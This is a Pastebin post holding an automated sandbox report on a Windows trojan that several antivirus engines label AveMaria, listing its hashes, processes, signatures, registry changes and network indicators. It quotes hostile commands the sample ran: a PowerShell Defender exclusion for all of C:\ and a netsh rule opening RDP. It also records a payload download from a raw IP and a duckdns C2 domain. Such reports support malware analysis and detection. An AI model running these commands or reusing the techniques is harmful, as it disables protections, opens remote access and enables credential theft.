paladin316

Exes_5ee66f8931bb0c281f27edb54aa5a50b_exe_2019-07-29_22_30.txt

Jul 29th, 2019
2,027
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.35 KB | None | 0 0
  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_5ee66f8931bb0c281f27edb54aa5a50b.exe"
  7. * File Size: 386560
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "dbfe4a369975251fd14e5d160f2edde33942723a9bb3b4e6b5f445dd5b9dc549"
  10. * MD5: "5ee66f8931bb0c281f27edb54aa5a50b"
  11. * SHA1: "a1ea412a7e724093a93401cc281a6b5d9ec407e4"
  12. * SHA512: "e1afc8b80fe2cc5624d83697f566b5bfed01b4c23b3f741394ca10081233008af5c2b91958a8d4957da1fa7bf1125acb5854f249f07795e2f6cd90e73e789665"
  13. * CRC32: "6448BCE2"
  14. * SSDEEP: "3072:RgDuk3PPZ8QambZCHsWWl0puTUWTPw2Gwdf/DlLg2Mt7LUNnyi77YXpab3rsVaPd:qDLJZCHouQJLe24OQab3r7HuV"
  15.  
  16. * Process Execution:
  17. "Exes_5ee66f8931bb0c281f27edb54aa5a50b.exe",
  18. "powershell.exe",
  19. "images.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "ypbbEnmG..exe",
  23. "netsh.exe",
  24. "services.exe",
  25. "svchost.exe",
  26. "WmiPrvSE.exe",
  27. "svchost.exe",
  28. "svchost.exe",
  29. "svchost.exe",
  30. "svchost.exe",
  31. "svchost.exe",
  32. "lsass.exe",
  33. "taskhost.exe",
  34. "sc.exe",
  35. "svchost.exe",
  36. "svchost.exe",
  37. "taskhost.exe",
  38. "lsm.exe"
  39.  
  40.  
  41. * Executed Commands:
  42. "powershell Add-MpPreference -ExclusionPath C:\\",
  43. "C:\\Users\\user\\AppData\\Roaming\\ypbbEnmG..exe ",
  44. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  45. "netsh advfirewall firewall add rule name=\"3389\" dir=in action=allow protocol=TCP localport=3389",
  46. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  47. "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
  48. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  49. "C:\\Windows\\system32\\lsass.exe",
  50. "taskhost.exe $(Arg0)",
  51. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  52. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  53. "C:\\Windows\\system32\\svchost.exe -k LocalService"
  54.  
  55.  
  56. * Signatures Detected:
  57.  
  58. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  59. "Details":
  60.  
  61. "IP": "66.154.103.133:80"
  62.  
  63.  
  64. "IP": "14.54.67.91:53"
  65.  
  66.  
  67.  
  68.  
  69. "Description": "Creates RWX memory",
  70. "Details":
  71.  
  72.  
  73. "Description": "A process attempted to delay the analysis task.",
  74. "Details":
  75.  
  76. "Process": "cmd.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  77.  
  78.  
  79. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  80.  
  81.  
  82. "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  83.  
  84.  
  85.  
  86.  
  87. "Description": "Loads a driver",
  88. "Details":
  89.  
  90. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  91.  
  92.  
  93.  
  94.  
  95. "Description": "Network anomalies occured during the analysis.",
  96. "Details":
  97.  
  98. "Anomaly": "'239.255.255.250' getaddrinfo with no actual connection to the IP."
  99.  
  100.  
  101.  
  102.  
  103. "Description": "Reads data out of its own binary image",
  104. "Details":
  105.  
  106. "self_read": "process: images.exe, pid: 2240, offset: 0x00000000, length: 0x0005e600"
  107.  
  108.  
  109.  
  110.  
  111. "Description": "A process created a hidden window",
  112. "Details":
  113.  
  114. "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
  115.  
  116.  
  117.  
  118.  
  119. "Description": "Drops a binary and executes it",
  120. "Details":
  121.  
  122. "binary": "C:\\ProgramData\\images.exe"
  123.  
  124.  
  125. "binary": "C:\\ProgramData\\images.exe"
  126.  
  127.  
  128. "binary": "C:\\Users\\user\\AppData\\Roaming\\ypbbEnmG..exe"
  129.  
  130.  
  131.  
  132.  
  133. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  134. "Details":
  135.  
  136. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  137.  
  138.  
  139. "suspicious_request": "http://66.154.103.133/upnp.exe"
  140.  
  141.  
  142.  
  143.  
  144. "Description": "Performs some HTTP requests",
  145. "Details":
  146.  
  147. "url": "http://66.154.103.133/upnp.exe"
  148.  
  149.  
  150.  
  151.  
  152. "Description": "The binary likely contains encrypted or compressed data.",
  153. "Details":
  154.  
  155. "section": "name: .data, entropy: 7.56, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0003bc00, virtual_size: 0x0003c934"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  161. "Details":
  162.  
  163. "file": "C:\\ProgramData\\images.exe:Zone.Identifier"
  164.  
  165.  
  166.  
  167.  
  168. "Description": "Code injection with CreateRemoteThread in a remote process",
  169. "Details":
  170.  
  171. "Injection": "images.exe(2240) -> cmd.exe(3008)"
  172.  
  173.  
  174.  
  175.  
  176. "Description": "Attempts to restart the guest VM",
  177. "Details":
  178.  
  179.  
  180. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  181. "Details":
  182.  
  183. "Process": "svchost.exe (2700)"
  184.  
  185.  
  186.  
  187.  
  188. "Description": "Attempts to stop active services",
  189. "Details":
  190.  
  191. "servicename": "UmRdpService"
  192.  
  193.  
  194.  
  195.  
  196. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  197. "Details":
  198.  
  199. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13338708 times"
  200.  
  201.  
  202.  
  203.  
  204. "Description": "Steals private information from local Internet browsers",
  205. "Details":
  206.  
  207. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  208.  
  209.  
  210.  
  211.  
  212. "Description": "Installs itself for autorun at Windows startup",
  213. "Details":
  214.  
  215. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
  216.  
  217.  
  218. "data": "C:\\ProgramData\\images.exe"
  219.  
  220.  
  221. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
  222.  
  223.  
  224. "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
  225.  
  226.  
  227.  
  228.  
  229. "Description": "Creates a hidden or system file",
  230. "Details":
  231.  
  232. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1bd1009.TMP"
  233.  
  234.  
  235.  
  236.  
  237. "Description": "File has been identified by 28 Antiviruses on VirusTotal as malicious",
  238. "Details":
  239.  
  240. "FireEye": "Generic.mg.5ee66f8931bb0c28"
  241.  
  242.  
  243. "McAfee": "Artemis!5EE66F8931BB"
  244.  
  245.  
  246. "CrowdStrike": "win/malicious_confidence_100% (W)"
  247.  
  248.  
  249. "K7GW": "Riskware ( 0040eff71 )"
  250.  
  251.  
  252. "K7AntiVirus": "Riskware ( 0040eff71 )"
  253.  
  254.  
  255. "Symantec": "ML.Attribute.HighConfidence"
  256.  
  257.  
  258. "APEX": "Malicious"
  259.  
  260.  
  261. "Avast": "Win32:Malware-gen"
  262.  
  263.  
  264. "Kaspersky": "Trojan-Spy.Win32.AveMaria.bmp"
  265.  
  266.  
  267. "Paloalto": "generic.ml"
  268.  
  269.  
  270. "AegisLab": "Trojan.Multi.Generic.4!c"
  271.  
  272.  
  273. "Tencent": "Win32.Trojan.Inject.Auto"
  274.  
  275.  
  276. "Endgame": "malicious (high confidence)"
  277.  
  278.  
  279. "DrWeb": "Trojan.PWS.Maria.4"
  280.  
  281.  
  282. "Invincea": "heuristic"
  283.  
  284.  
  285. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.fc"
  286.  
  287.  
  288. "Trapmine": "malicious.moderate.ml.score"
  289.  
  290.  
  291. "SentinelOne": "DFI - Malicious PE"
  292.  
  293.  
  294. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  295.  
  296.  
  297. "ZoneAlarm": "Trojan-Spy.Win32.AveMaria.bmp"
  298.  
  299.  
  300. "Acronis": "suspicious"
  301.  
  302.  
  303. "MAX": "malware (ai score=96)"
  304.  
  305.  
  306. "Cylance": "Unsafe"
  307.  
  308.  
  309. "ESET-NOD32": "a variant of Win32/GenKryptik.DOSA"
  310.  
  311.  
  312. "Rising": "[email protected] (RDML:VIVbkefa9Ok06VaT+w/GOw)"
  313.  
  314.  
  315. "AVG": "Win32:Malware-gen"
  316.  
  317.  
  318. "Cybereason": "malicious.931bb0"
  319.  
  320.  
  321. "Qihoo-360": "HEUR/QVM20.1.D9B7.Malware.Gen"
  322.  
  323.  
  324.  
  325.  
  326. "Description": "Creates a copy of itself",
  327. "Details":
  328.  
  329. "copy": "C:\\ProgramData\\images.exe"
  330.  
  331.  
  332. "copy": "C:\\ProgramData\\images.exe"
  333.  
  334.  
  335.  
  336.  
  337. "Description": "Harvests information related to installed mail clients",
  338. "Details":
  339.  
  340. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
  341.  
  342.  
  343. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  344.  
  345.  
  346. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Server"
  347.  
  348.  
  349. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
  350.  
  351.  
  352. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Account Name"
  353.  
  354.  
  355. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
  356.  
  357.  
  358. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  359.  
  360.  
  361. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
  362.  
  363.  
  364. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  365.  
  366.  
  367. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
  368.  
  369.  
  370. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
  371.  
  372.  
  373. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
  374.  
  375.  
  376. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  377.  
  378.  
  379. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
  380.  
  381.  
  382. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Server"
  383.  
  384.  
  385. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
  386.  
  387.  
  388. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
  389.  
  390.  
  391. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Account Name"
  392.  
  393.  
  394. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
  395.  
  396.  
  397. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  398.  
  399.  
  400. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
  401.  
  402.  
  403. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
  404.  
  405.  
  406. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  407.  
  408.  
  409.  
  410.  
  411. "Description": "Collects information to fingerprint the system",
  412. "Details":
  413.  
  414.  
  415.  
  416. * Started Service:
  417. "TermService",
  418. "VaultSvc",
  419. "PolicyAgent",
  420. "WerSvc",
  421. "UmRdpService",
  422. "W32Time"
  423.  
  424.  
  425. * Mutexes:
  426. "Global\\CLR_CASOFF_MUTEX",
  427. "TSLicensingLock"
  428.  
  429.  
  430. * Modified Files:
  431. "C:\\ProgramData\\images.exe",
  432. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  433. "\\??\\PIPE\\srvsvc",
  434. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1Q0OM5XJF8KHQCIYPL0F.temp",
  435. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  436. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\29-07-2019_21.59.45",
  437. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\upnp1.exe",
  438. "\\??\\PIPE\\samr",
  439. "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
  440. "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
  441. "C:\\Users\\user\\AppData\\Roaming\\.yHGsc..tmp",
  442. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\2J71QHB4AQWMAWZ8T5M9.temp",
  443. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1bd1009.TMP",
  444. "C:\\Windows\\inf\\setupapi.dev.log",
  445. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  446. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  447. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  448. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  449. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  450. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  451. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  452. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  453. "\\Device\\Http\\Communication",
  454. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  455. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  456. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5cdec238-ef10-49bb-a11f-04a98a11b799",
  457. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  458. "C:\\rdpwrap.txt",
  459. "\\Device\\Termdd",
  460. "\\Device\\RdpDr",
  461. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  462. "\\??\\PIPE\\lsarpc"
  463.  
  464.  
  465. * Deleted Files:
  466. "C:\\ProgramData\\images.exe:Zone.Identifier",
  467. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1Q0OM5XJF8KHQCIYPL0F.temp",
  468. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1944.29147171",
  469. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1944.29147171",
  470. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1944.29147171",
  471. "C:\\Users\\user\\AppData\\Roaming\\.yHGsc..tmp",
  472. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1bd1009.TMP",
  473. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1612.29167703",
  474. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1612.29167703",
  475. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1612.29167703"
  476.  
  477.  
  478. * Modified Registry Keys:
  479. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  480. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
  481. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
  482. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WE4LOO3APQ",
  483. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WE4LOO3APQ\\inst",
  484. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
  485. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  486. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  487. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\lgifeCI",
  488. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WE4LOO3APQ\\rudp",
  489. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WE4LOO3APQ\\rpdp",
  490. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
  491. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  492. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  493. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  494. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  495. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  496. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  497. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  498. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  499. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  500. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  501. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  502. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  503. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  504. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  505. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  507. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  508. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  509. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  510. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  511. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  512. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  513. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  514. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
  515. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
  516. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
  517. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
  518. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
  519. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
  520. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
  521. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
  522. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
  523. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
  524. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
  525. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
  526. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
  527. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
  528. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
  529. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
  530. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
  531. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
  532. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  533. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  534. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  535. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  536. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  537. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  538. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  539. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  540. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  541. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining"
  542.  
  543.  
  544. * Deleted Registry Keys:
  545. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
  546.  
  547.  
  548. * DNS Communications:
  549.  
  550. "type": "A",
  551. "request": "amariceo.duckdns.org",
  552. "answers":
  553.  
  554. "data": "75.127.5.164",
  555. "type": "A"
  556.  
  557.  
  558.  
  559.  
  560.  
  561. * Domains:
  562.  
  563. "ip": "75.127.5.164",
  564. "domain": "amariceo.duckdns.org"
  565.  
  566.  
  567.  
  568. * Network Communication - ICMP:
  569.  
  570. * Network Communication - HTTP:
  571.  
  572. "count": 1,
  573. "body": "",
  574. "uri": "http://66.154.103.133/upnp.exe",
  575. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  576. "method": "GET",
  577. "host": "66.154.103.133",
  578. "version": "1.1",
  579. "path": "/upnp.exe",
  580. "data": "GET /upnp.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 66.154.103.133\r\nConnection: Keep-Alive\r\n\r\n",
  581. "port": 80
  582.  
  583.  
  584.  
